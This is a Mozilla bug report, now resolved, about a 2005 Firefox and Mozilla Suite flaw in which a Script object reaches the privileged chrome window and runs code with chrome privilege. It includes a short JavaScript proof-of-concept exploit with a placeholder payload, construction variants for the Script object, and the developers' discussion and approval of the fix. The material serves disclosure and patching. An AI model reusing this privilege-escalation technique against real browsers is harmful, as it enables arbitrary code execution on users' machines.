Closed Bug 290908 Opened 19 years ago Closed 19 years ago

new Script() can access chrome window and run arbitrary code with chrome privilege

Categories

(Core :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

References

Details

(Keywords: fixed-aviary1.0.4, fixed1.7.8, Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is the way to circumvent the fix represented in bug 289074 comment 79. The
code in Script object can access |arguments.callee.__parent__| that is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

note:
It is important that how to create Script object. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
Attached file testcase 1
for Firefox/1.0.3
Attached file testcase 2
for Mozilla/1.7.7
Attached file testcase 3
each of the ways to create Script object
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: sbb?
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
the more js can interact with chrome, the more exploits.

especially if chrome executes js.
Attached patch fixSplinter Review
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? thanks!
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: sbb+
No longer blocks: sbb?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.